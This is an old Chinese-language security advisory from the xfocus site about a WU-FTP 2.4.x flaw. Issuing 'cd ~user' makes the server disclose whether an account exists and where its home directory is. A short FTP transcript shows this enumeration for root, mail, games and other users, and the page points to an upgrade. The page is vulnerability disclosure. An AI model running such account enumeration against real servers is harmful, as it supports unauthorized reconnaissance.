xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

WU-FTP 2.4.x存在泄露用户信息的漏洞


发布时间:1999-11-15
更新时间:1999-11-15
严重程度:
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式

受影响系统
Misc
WU-FTP 2.4.x
详细描述
WU-FTP程序是用来使远程用户获得UNIX系统中的用户和其他
信息。通过使用cd(CWD) 命令加上用户的home目录如(cd
~user),WU-FTP会泄露home的物理路径或者泄露某个帐户
是否为标准帐户,如root,games,uucp等,如果不是标准或
不存在的帐户, FTP守护程序会表明不知道此用户,也就是
让远程用户获得了一些有用信息。

测试代码
tp> cd ~mail
550 /var/spool/mail: No such file or directory.

(The user mail exists, and its path
is /var/spool/mail)
ftp> cd ~games
550 /usr/games: No such file or directory.

(the user games exists, and its path
is /usr/games)
ftp> cd ~root
550 /root: No such file or directory.

(the user root exists, and its path is /root)

ftp> cd ~guest
550 Unknown user name after ~

(the user 'guest' does not exist)
ftp> cd ~jsmith
550 Unknown user name after ~
ftp> cd ~nobody
550 /dev/null: No such file or directory.

解决方案
到下面的站点升级:
http://www.academ.com/academ/wu-ftpd/

相关信息
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved